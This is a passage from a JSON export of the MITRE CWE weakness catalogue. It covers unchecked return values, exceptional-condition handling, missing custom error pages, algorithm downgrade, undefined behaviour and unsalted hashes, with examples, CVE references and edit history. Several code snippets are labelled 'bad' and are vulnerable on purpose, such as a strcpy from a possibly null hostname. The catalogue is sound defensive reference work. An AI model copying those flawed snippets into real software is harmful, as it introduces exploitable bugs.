array.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"char[] byteArray = new char[1024];for (IEnumerator i=users.GetEnumerator(); i.MoveNext() ;i.Current()) {}","xhtml:br":"","xhtml:div":{"#text":"String userName = (String) i.Current();String pFileName = PFILE_ROOT + \\"/\\" + userName;StreamReader sr = new StreamReader(pFileName);sr.Read(byteArray,0,1024);//the file is always 1k bytessr.Close();processPFile(userName, byteArray);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"FileInputStream fis;byte[] byteArray = new byte[1024];for (Iterator i=users.iterator(); i.hasNext();) {","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String userName = (String) i.next();String pFileName = PFILE_ROOT + \\"/\\" + userName;FileInputStream fis = new FileInputStream(pFileName);fis.read(byteArray); // the file is always 1k bytesfis.close();processPFile(userName, byteArray);","xhtml:br":["","","","","",""]}}}}],"Body_Text":"The code loops through a set of users, reading a private data file for each user. The programmer assumes that the files are always 1 kilobyte in size and therefore ignores the return value from Read(). If an attacker can create a smaller file, the program will recycle the remainder of the data from the previous user and treat it as though it belongs to the attacker."},{"attr":{"@_Demonstrative_Example_ID":"DX-10"},"Intro_Text":"The following code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String itemName = request.getParameter(ITEM_NAME);if (itemName.compareTo(IMPORTANT_ITEM) == 0) {}...","xhtml:br":["",""],"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String itemName = request.Item(ITEM_NAME);if (itemName.Equals(IMPORTANT_ITEM)) {}...","xhtml:br":["",""],"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["The following code does not check to see if the string returned by the Item property is null before calling the member function Equals(), potentially causing a NULL dereference.","The traditional defense of this coding error is: \\"I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn\'t matter whether I handle the error or simply allow the program to die dereferencing a null value.\\" But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved."]},{"attr":{"@_Demonstrative_Example_ID":"DX-11"},"Intro_Text":"The following code shows a system property that is set to null and later dereferenced by a programmer who mistakenly assumes it will always be defined.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"System.clearProperty(\\"os.name\\");...String os = System.getProperty(\\"os.name\\");if (os.equalsIgnoreCase(\\"Windows 95\\")) System.out.println(\\"Not supported\\");","xhtml:br":["","",""]}},"Body_Text":"The traditional defense of this coding error is: \\"I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn\'t matter whether I handle the error or simply allow the program to die dereferencing a null value.\\" But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved."},{"attr":{"@_Demonstrative_Example_ID":"DX-12"},"Intro_Text":"The following VB.NET code does not check to make sure that it has read 50 bytes from myfile.txt. This can cause DoDangerousOperation() to operate on an unexpected value.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"Dim MyFile As New FileStream(\\"myfile.txt\\", FileMode.Open, FileAccess.Read, FileShare.Read)Dim MyArray(50) As ByteMyFile.Read(MyArray, 0, 50)DoDangerousOperation(MyArray(20))","xhtml:br":["","",""]}},"Body_Text":"In .NET, it is not uncommon for programmers to misunderstand Read() and related methods that are part of many System.IO classes. The stream and reader classes do not consider it to be unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference\\n\\t       (CWE-476) would then occur in the call to strcpy().","Note that this code is also vulnerable to a buffer overflow (CWE-119)."]},{"Intro_Text":"In the following C/C++ example the method outputStringToFile opens a file in the local filesystem and outputs a string to the file. The input parameters output and filename contain the string to output to the file and the name of the file respectively.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"int outputStringToFile(char *output, char *filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"openFileToWrite(filename);writeToFile(output);closeFile(filename);","xhtml:br":["","",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"int outputStringToFile(char *output, char *filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int isOutput = SUCCESS;int isOpen = openFileToWrite(filename);if (isOpen == FAIL) {}else {}return isOutput;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to open file %s\\", filename);isOutput = FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int isWrite = writeToFile(output);if (isWrite == FAIL) {}int isClose = closeFile(filename);if (isClose == FAIL)","xhtml:br":["","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to write to file %s\\", filename);isOutput = FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"isOutput = FAIL;","attr":{"@_style":"margin-left:10px;"}}]}}]}}}}],"Body_Text":"However, this code does not check the return values of the methods openFileToWrite, writeToFile, closeFile to verify that the file was properly opened and closed and that the string was successfully written to the file. The return values for these methods should be checked to determine if the method was successful and allow for detection of errors or unexpected conditions as in the following example."},{"Intro_Text":"In the following Java example the method readFromFile uses a FileReader object to read the contents of a file. The FileReader object is created using the File object readFile, the readFile object is initialized using the setInputFile method. The setInputFile method should be called before calling the readFromFile method.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private File readFile = null;public void setInputFile(String inputFile) {}public void readFromFile() {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// create readFile File object from string containing name of file"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (FileNotFoundException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"reader = new FileReader(readFile);","xhtml:br":["","",""],"xhtml:i":"// read input file"}}}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private File readFile = null;public void setInputFile(String inputFile) {}public void readFromFile() {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// create readFile File object from string containing name of file"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (FileNotFoundException ex) {...}catch (NullPointerException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (readFile == null) {}reader = new FileReader(readFile);","xhtml:div":{"#text":"System.err.println(\\"Input file has not been set, call setInputFile method before calling openInputFile\\");throw NullPointerException;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["","","","",""],"xhtml:i":"// read input file"}},"xhtml:br":""}}]}}],"Body_Text":"However, the readFromFile method does not check to see if the readFile object is null, i.e. has not been initialized, before creating the FileReader object and reading from the input file. The readFromFile method should verify whether the readFile object is null and output an error message and raise an exception if the readFile object is null, as in the following code."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-3798","Description":"Unchecked return value leads to resultant integer overflow and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3798"},{"Reference":"CVE-2006-4447","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4447"},{"Reference":"CVE-2006-2916","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2916"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"CWE More Abstract"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Program Building Blocks&#34; Page 341"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 1, &#34;Exceptional Conditions,&#34; Page 22"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 11: Failure to Handle Errors Correctly.&#34; Page 183"}},{"attr":{"@_External_Reference_ID":"REF-622"}}]},"Notes":{"Note":{"#text":"Sometimes, when a return value can be used to indicate an error, an unchecked return value is a code-layer instance of a missing application-layer check for exceptional conditions. However, return values are not always needed to communicate exceptional conditions. For example, expiration of resources, values passed by reference, asynchronously modified data, sockets, etc. may indicate exceptional conditions without the use of a return value.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03","Submission_Comment":"New entry for reorganization of CWE-703."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Improper Check for Exceptional Conditions","attr":{"@_Date":"2010-02-16"}}}},"755":{"attr":{"@_ID":"755","@_Name":"Improper Handling of Exceptional Conditions","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not handle or incorrectly handles an exceptional condition.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2021-3011","Description":"virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011"},{"Reference":"CVE-2008-4302","Description":"Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4302"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03","Submission_Comment":"New entry for reorganization of CWE-703."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"756":{"attr":{"@_ID":"756","@_Name":"Missing Custom Error Page","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not return custom error pages to the user, possibly exposing sensitive information.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"209","@_View_ID":"1000"}}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Attackers can leverage the additional information provided by a default error page to mount attacks targeted on the framework, database, or other resources used by the application."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-76"},"Intro_Text":"In the snippet below, an unchecked runtime exception thrown from within the try block may cause the container to display its default error page (which may contain a full stack trace, among other things).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"#text":"try {} catch (ApplicationSpecificException ase) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"Caught: \\" + ase.toString());","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-75"},"Intro_Text":"The mode attribute of the &lt;customErrors&gt; tag in the Web.config file defines whether custom or default error pages are used.","Body_Text":["In the following insecure ASP.NET application setting, custom error message mode is turned off. An ASP.NET error message with detailed stack trace and platform versions will be returned.","A more secure setting is to set the custom error message mode for remote users only. No defaultRedirect error page is specified. The local user on the web server will see a detailed stack trace. For remote users, an ASP.NET error message with the server customError configuration setting and the platform version will be returned.","Another secure option is to set the mode attribute of the &lt;customErrors&gt; tag to use a custom page as follows:"],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":"&lt;customErrors mode=\\"Off\\" /&gt;"},{"attr":{"@_Nature":"good","@_Language":"ASP.NET"},"xhtml:div":"&lt;customErrors mode=\\"RemoteOnly\\" /&gt;"},{"attr":{"@_Nature":"good","@_Language":"ASP.NET"},"xhtml:div":"&lt;customErrors mode=\\"On\\" defaultRedirect=\\"YourErrorPage.htm\\" /&gt;"}]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03","Submission_Comment":"New entry for reorganization of CWE-703."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"757":{"attr":{"@_ID":"757","@_Name":"Selection of Less-Secure Algorithm During Negotiation (\'Algorithm Downgrade\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A protocol or its implementation supports interaction between multiple actors and allows those actors to negotiate which algorithm should be used as a protection mechanism such as encryption or authentication, but it does not select the strongest algorithm that is available to both parties.","Extended_Description":"When a security mechanism can be forced to downgrade to use a less secure algorithm, this can make it easier for attackers to compromise the software by exploiting weaker algorithm. The victim might not be aware that the less secure algorithm is being used. For example, if an attacker can force a communications channel to use cleartext instead of strongly-encrypted data, then the attacker could read the channel by sniffing, instead of going through extra effort of trying to decrypt the data using brute force techniques.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-4302","Description":"Attacker can select an older version of the software to exploit its vulnerabilities.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4302"},{"Reference":"CVE-2006-4407","Description":"Improper prioritization of encryption ciphers during negotiation leads to use of a weaker cipher.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4407"},{"Reference":"CVE-2005-2969","Description":"chain: SSL/TLS implementation disables a verification step (CWE-325) that enables a downgrade attack to a weaker protocol.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2969"},{"Reference":"CVE-2001-1444","Description":"Telnet protocol implementation allows downgrade to weaker authentication and encryption using an Adversary-in-the-Middle AITM attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1444"},{"Reference":"CVE-2002-1646","Description":"SSH server implementation allows override of configuration setting to use weaker authentication schemes. This may be a composite with CWE-642.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1646"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"220"}},{"attr":{"@_CAPEC_ID":"606"}},{"attr":{"@_CAPEC_ID":"620"}}]},"Notes":{"Note":{"#text":"This is related to CWE-300, although not all downgrade attacks necessarily require an entity that redirects or interferes with the network.  See examples.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"758":{"attr":{"@_ID":"758","@_Name":"Reliance on Undefined, Unspecified, or Implementation-Defined Behavior","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses an API function, data structure, or other entity in a way that relies on properties that are not always guaranteed to hold for that entity.","Extended_Description":"This can lead to resultant weaknesses when the required properties change, such as when the software is ported to a different platform or if an interaction error (CWE-435) occurs.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-1902","Description":"Change in C compiler behavior causes resultant buffer overflows in programs that depend on behaviors that were undefined in the C standard.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1902"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR32-C","Entry_Name":"Ensure size arguments for variable length arrays are in a valid range","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR34-C","Entry_Name":"Detect errors when converting a string to a number","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP30-C","Entry_Name":"Do not depend on the order of evaluation for side effects","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP33-C","Entry_Name":"Do not read uninitialized memory","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO46-C","Entry_Name":"Do not access a closed file","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT34-C","Entry_Name":"Do not shift an expression by a negative number of bits or by greater than or equal  to the number of bits that exist in the operand","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT36-C","Entry_Name":"Converting a pointer to integer or integer to pointer","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC14-C","Entry_Name":"Do not introduce unnecessary platform dependencies"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC15-C","Entry_Name":"Do not depend on undefined behavior"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC37-C","Entry_Name":"Ensure that control never reaches the end of a non-void function","Mapping_Fit":"CWE More Abstract"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"759":{"attr":{"@_ID":"759","@_Name":"Use of a One-Way Hash without a Salt","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the software does not also use a salt as part of the input.","Extended_Description":{"xhtml:p":["This makes it easier for attackers to pre-compute the hash value using dictionary attack techniques such as rainbow tables.","It should be noted that, despite common perceptions, the use of a good salt with a hash does not sufficiently increase the effort for an attacker who is targeting an individual password, or who has a large amount of computing resources available, such as with cloud-based services 